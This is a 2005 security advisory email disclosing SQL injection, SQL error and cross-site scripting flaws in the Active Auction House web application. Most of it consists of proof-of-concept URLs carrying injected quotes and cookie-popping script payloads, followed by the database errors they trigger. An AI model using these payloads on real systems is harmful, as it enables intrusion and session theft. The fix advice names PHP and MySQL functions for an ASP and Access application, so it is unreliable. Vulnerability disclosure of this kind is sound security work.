This is a multi-part message in MIME format. ------=_NextPart_000_0006_01C53A39.2224C870 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dcrab 's Security Advisory [Hsc Security Group] http://www.hackerscenter.com/ [dP Security] http://digitalparadox.org/ Get Dcrab's Services to audit your Web servers, scripts, networks, etc. = Learn more at http://www.digitalparadox.org/services.ah Severity: High Title: Active Auction House has multiple Sql injection, error and XSS = vulnerabilities Date: 06/04/2005 Vendor: Active Web Softwares Vendor Website: www.activewebsoftwares.com Summary: Active auction house has multiple sql injection, error and xss = vulnerabilities. Proof of Concept Exploits:=20 http://localhost/activeauctionsuperstore/default.asp?catid=3D'SQL_ERROR SQL ERROR Microsoft OLE DB Provider for ODBC Drivers error '80040e21' ODBC driver does not support the requested properties. /activeauctionsuperstore/displaycategories.asp, line 52 http://localhost/activeauctionsuperstore/default.asp?Sortby=3DItemName&So= rtDir=3D'SQL_INJECTION SQL INJECTION Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in = query expression 'ItemName 'SQL_INJECTION'. /activeauctionsuperstore/includes/gentable.asp, line 39 http://localhost/activeauctionsuperstore/default.asp?Sortby=3D'SQL_INJECT= ION SQL INJECTION Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in = query expression ''SQL_INJECTION'. /activeauctionsuperstore/includes/gentable.asp, line 39 http://localhost/activeauctionsuperstore/ItemInfo.asp?itemID=3D'SQL_INJEC= TION SQL INJECTION Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in = query expression 'ItemID=3D'SQL_INJECTION'. /activeauctionsuperstore/ItemInfo.asp, line 18 http://localhost/activeauctionsuperstore/sendpassword.asp SQL INJECTON In the Email field enter a sql injection and done ;) For example entering 'SQL_INJECTION you get Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in FROM clause. /activeauctionsuperstore/sendpassword.asp, line 45 http://localhost/activeauctionsuperstore/?ReturnURL=3D'%3E%3Cscript%3Eale= rt(document.cookie)%3C/script%3E&username=3Ddcrab&password=3D Pops cookie http://localhost/activeauctionsuperstore/?ReturnURL=3Dstart.asp&username=3D= dcrab&password=3D'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Pops cookie http://localhost/activeauctionsuperstore/?ReturnURL=3Dstart.asp&username=3D= '%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&&password=3D Pops cookie http://localhost/activeauctionsuperstore/account.asp?ReturnURL=3D%22%3E%3= Cscript%3Ealert(document.cookie)%3C/script%3E Pops cookie http://localhost/activeauctionsuperstore/sendpassword.asp?Table=3DAccount= s&Title=3D'php_evil_valuehttp://localhost/activeauctionsuperstore/sendpas= sword.asp?Table=3DAccounts&Title=3D%22%3E%3Cscript%3Ealert(document.cooki= e)%3C/script%3E Pops cookie http://localhost/activeauctionsuperstore/sendpassword.asp?Table=3DAccount= s&Title=3D"> Pops cookie http://localhost/activeauctionsuperstore/sendpassword.asp?Table=3D">alert(document.cookie)&Title=3DAccount Pops cookie http://localhost/activeauctionsuperstore/watchthisitem.asp?itemid=3D">alert(document.cookie)&%3baccountid=3D Pops cookie Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), = mysql_real_escape_string() and other functions for input validation = before passing user input to the mysql database, or before echoing data = on the screen, would solve these problems. Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah Author:=20 These vulnerabilties have been found and released by Diabolic Crab, = Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to = contact me regarding these vulnerabilities. You can find me at, = http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for = my soon to come out book on Secure coding with php. -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 - not licensed for commercial use: www.pgp.com iQA/AwUBQlLSLSZV5e8av/DUEQJy+wCfficKxFWekfTVbslFf6X2fYgkFZ0AniJA lWYvwOWmoKGHgDKanamGDcvc =3DGAwn -----END PGP SIGNATURE----- ------=_NextPart_000_0006_01C53A39.2224C870 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
-----BEGIN PGP SIGNED = MESSAGE-----
Hash:=20 SHA1
 
Dcrab 's Security Advisory
[Hsc = Security Group]=20 http://www.hackerscenter.com/<= BR>[dP=20 Security] http://digitalparadox.org/
=
 
Get Dcrab's Services to audit your Web = servers,=20 scripts, networks, etc. Learn more at http://www.digitalpara= dox.org/services.ah
 
Severity: High
Title: Active Auction = House has=20 multiple Sql injection, error and XSS vulnerabilities
Date:=20 06/04/2005
 
Vendor: Active Web Softwares
Vendor = Website: www.activewebsoftwares.com=
Summary:=20 Active auction house has multiple sql injection, error and xss=20 vulnerabilities.
 
Proof of Concept Exploits: =
 
http://localhost/activeauctionsuperstore/default.asp?catid=3D'SQL= _ERROR
SQL=20 ERROR
Microsoft OLE DB Provider for ODBC Drivers error=20 '80040e21'
 
ODBC driver does not support the = requested=20 properties.
 
/activeauctionsuperstore/displaycategories.asp,=20 line 52
 

http://localhost/activeauctionsuperst= ore/default.asp?Sortby=3DItemName&SortDir=3D'SQL_INJECTION
SQL= =20 INJECTION
Microsoft OLE DB Provider for ODBC Drivers error = '80040e14'
 
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in = query=20 expression 'ItemName 'SQL_INJECTION'.
 
/activeauctionsuperstore/includes/gentable.asp, line 39
 

http://localhost/activeauctionsuperstore/default.asp?Sortby=3D= 'SQL_INJECTION
SQL=20 INJECTION
Microsoft OLE DB Provider for ODBC Drivers error = '80040e14'
 
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in = query=20 expression ''SQL_INJECTION'.
 
/activeauctionsuperstore/includes/gentable.asp, line 39
 

http://localhost/activeauctionsuperstore/ItemInfo.asp?itemI= D=3D'SQL_INJECTION
SQL=20 INJECTION
Microsoft OLE DB Provider for ODBC Drivers error = '80040e14'
 
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in = query=20 expression 'ItemID=3D'SQL_INJECTION'.
 
/activeauctionsuperstore/ItemInfo.asp, line 18
 

http:/= /localhost/activeauctionsuperstore/sendpassword.asp
SQL=20 INJECTON
In the Email field enter a sql injection and done ;) For=20 example
entering 'SQL_INJECTION you get
Microsoft OLE DB Provider = for ODBC=20 Drivers error '80040e14'
 
[Microsoft][ODBC Microsoft Access Driver] Syntax error in=20 FROM
clause.
 
/activeauctionsuperstore/sendpassword.asp, line 45
 

http://localhost/activeauctionsuperstore/?ReturnURL=3D'%3E%3Cscript%3E= alert(document.cookie)%3C/script%3E&username=3Ddcrab&password= =3D
Pops=20 cookie
 

http://localhost/activeauctionsuperstore/?ReturnURL=3Dstar= t.asp&username=3Ddcrab&password=3D'%3E%3Cscript%3Ealert(document.= cookie)%3C/script%3E
Pops=20 cookie
 

http://localhost/activeauctionsuperstore/?ReturnURL=3Dstart.a= sp&username=3D'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&= ;&password=3D
Pops=20 cookie
 

http://localhost/a= ctiveauctionsuperstore/account.asp?ReturnURL=3D%22%3E%3Cscript%3Ealert(do= cument.cookie)%3C/script%3E
Pops=20 cookie
 

http://localhost/activeauctionsuperstore/= sendpassword.asp?Table=3DAccounts&Title=3D'php_evil_valuehttp://local= host/activeauctionsuperstore/sendpassword.asp?Table=3DAccounts&Title=3D= %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops=20 cookie
 

&Title=3DAccount'>http://loc= alhost/activeauctionsuperstore/sendpassword.asp?Table=3D"><script&g= t;alert(document.cookie)</script>&Title=3DAccount
Pops=20 cookie
 

&amp%3baccountid'>http://= localhost/activeauctionsuperstore/watchthisitem.asp?itemid=3D"><scr= ipt>alert(document.cookie)</script>&amp%3baccountid=3DPops=20 cookie
 

Possible Fixes: The usage of htmlspeacialchars(),=20 mysql_escape_string(), mysql_real_escape_string() and other functions = for input=20 validation before passing user input to the mysql database, or before = echoing=20 data on the screen, would solve these problems.
 
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.a= h
 
Author:
These vulnerabilties have been found and released by = Diabolic=20 Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel = free to=20 contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com = or http://digitalparadox.org/. = Lookout for my=20 soon to come out book on Secure coding with php.
 
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed = for=20 commercial use: www.pgp.com
 
iQA/AwUBQlLSLSZV5e8av/DUEQJy+wCfficKxFWekfTVbslFf6X2fYgkFZ0AniJA
= lWYvwOWmoKGHgDKanamGDcvc
=3DGAwn
-----END=20 PGP SIGNATURE-----
 
------=_NextPart_000_0006_01C53A39.2224C870--